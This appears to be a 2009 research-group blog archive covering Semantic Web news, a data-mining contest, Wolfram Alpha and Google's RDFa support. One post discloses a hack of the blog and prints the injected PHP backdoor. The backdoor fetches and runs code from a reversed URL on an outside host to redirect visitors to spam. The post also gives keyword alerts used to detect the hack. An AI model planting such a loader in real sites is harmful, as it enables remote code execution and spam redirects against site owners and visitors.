May 29th, 2009
Price Waterhouse Coopers is one of the largest “professional services” organization and has always been strong on technology consulting and advice. The Spring issue of their quarterly Technology Forecast journal focuses on the Semantic Web. This is from the table of contents
- 04 Spinning a data Web. Semantic Web technologies could revolutionize enterprise decision making and information sharing. Here’s why.
- 20 Making Semantic Web connections. Linked Data technology can change the business of enterprise data management.
- 16 Traversing the Giant Global Graph. Tom Scott of BBC Earth describes how everyone benefits from interoperable data.
- 28 From folksonomies to ontologies. Uche Ogbuji of Zepheira discusses how early adopters are introducing Semantic Web to the enterprise.
- 40 How the Semantic Web might improve cancer treatment. M. D. Anderson’s Lynn Vogel explores new techniques for combining clinical and research data.
- 46 Semantic technologies at the ecosystem level. Frank Chum of Chevron talks about the need for shared ontologies in the oil and gas industry.
You can download the free 58 report here. You can also read a note on the issue in ReadWriteWeb, which focuses on linked data and interoperability.
“A new PricewaterhouseCoopersTechnology report explains how the Semantic Web and Linked Data can help enterprises manage their large scale data better. The PwC Center for Technology and Innovation team spent several months researching and analyzing the problem of data silos in enterprises – and what solutions are being developed to help with that problem. The answer, according to PwC, is Semantic Web techniques. PwC believes that the Semantic Web offers a practical way to address the problem of large-scale data integration. … “
(Spotted on firstname.lastname@example.org)
May 24th, 2009
For the past five years UCSD has run a student datamining contest sponsored by FICO, the decision management firm famous for developing the FICO credit score. The details of the 2009 datamining contest were released last week with results due on 15 July.
“This year’s contest consists of two classification tasks based on e-commerce transaction anomaly data. The first task is to maximize accuracy of binary classification on a test data set, given a fully labeled training data set. The performance metric is the lift at 20% review rate. The second task is similar to task 1, but provides a couple of additional fields that have potential predictive information.”
The contest is open to all full-time undergraduate and graduate students as well as postdocs. A total of $8,000 in prize money will be awarded in various categories.
(spotted on Hacker News)
May 21st, 2009
Who says that Twitter is not useful? The Boston Police Department is on record as promising to use twitter to alert us if and when the zombie apocalypse starts. You might want to check for #zombie before you go out the door in the morning.
May 21st, 2009
Yesterday we discovered that our ebiquity blog had been hacked. It looks like a vulnerability in our old WordPress installation was exploited to add the following code to the top of our blog’s main page.
< ?php $site = create_function('','$cachedir="/tmp/"; $param="qq"; $key=$_GET[$param]; $rand="1239aef"; $said=23; $type=1; $stprot="http://blogwp.info"; '.file_get_contents(strrev("txt.mrahp/elpmaxe/deliated/ofni.pwgolb//:ptth"))); $site(); ?>
This code caused URLs like https://ebiquity.umbc.edu/?qq=1671 to redirect to a spam page. We’ve upgraded the blog to the latest WordPress release, which hopefully will prevent this exploit from being used again. (Notice the reversed URL — LOL!)
We discovered the problem though a clever trick I read about last year on a site I’ve forgotten (maybe here). We created several Google alerts triggered by the appearance of spam-related words on pages apparently hosted by ebiquity.umbc.edu. For example:
- adult OR girls OR sex OR sexx OR XXX OR porn OR pornography site:ebiquity.umbc.edu
- viagra OR cialis OR levitra OR Phentermine OR Xanax site:ebiquity.umbc.edu
I would get several false positives a month from these alerts triggered by non-spam entries on our site. In fact, *this* post will generate a false positive. But yesterday I got a true positive. Looking at the log files, I think I got the alert within a few hours of when our blog was hacked. So I am happy to say that this worked and worked well. Without this alert, it might have taken weeks to notice the problem.
The results of this Google search reveal many compromised blogs from the .edu domain.
May 15th, 2009
Wolfram!Alpha is live. A document describing the Wolfram Alpha API can be found in Google’s cache.
Steve Wolfram wrote today in a blog post, Wolfram|Alpha Is Launching: Made Possible by Mathematica, on its relation to Mathematica.
“Wolfram|Alpha defines a new direction in computing—that would have simply not have been possible without Mathematica, and that in time will add some remarkable new dimensions to Mathematica itself. In terms of technology, Wolfram|Alpha is a uniquely complex software system, which has been entirely developed and deployed with Mathematica and Mathematica technologies. … When we launch Wolfram|Alpha this weekend, it will be running Mathematica on about 10,000 processor cores, using gridMathematica-based parallelism. And every single query that comes into the system will be served with webMathematica.”
And now, for a real test…
(spotted on Hacker News)
UPDATE: (5/18) The API document is officially now available.
May 12th, 2009
Google has announced that it will begin to recognize structured information encoded as metadata in either RDFa and in Microformats and use the metadata in search results snippets for reviews and people.
“Structured data makes the web a better place. It also helps Google better understand and present your page in search results. … Google’s first use of this data will be in search results snippets for two kinds of objects: Reviews and People. Providing more detail in search results helps users to understand the value of your pages. When users get more information showing how your page is relevant to their search, they’re more likely to click through to see the full page. … At Google, we believe in openness, so we are using two open standards to allow you to annotate structured data on your site: microformats and RDFa. Both standards allow markup of information on your pages.”
This is a case where Google is following Yahoo, which announced more general support for RDFa and microformats last Fall in their Search Monkey.
We expect that this is work in progress. While it’s great that Google is supporting RDFa annotations, they are asking people to start with the new RDF vocabulary defined at their site http://www.data-vocabulary.org/ rather than reusing or integrating with existing, widely used vocabularies. Let’s hope that they embrace the LOD vision in the near future.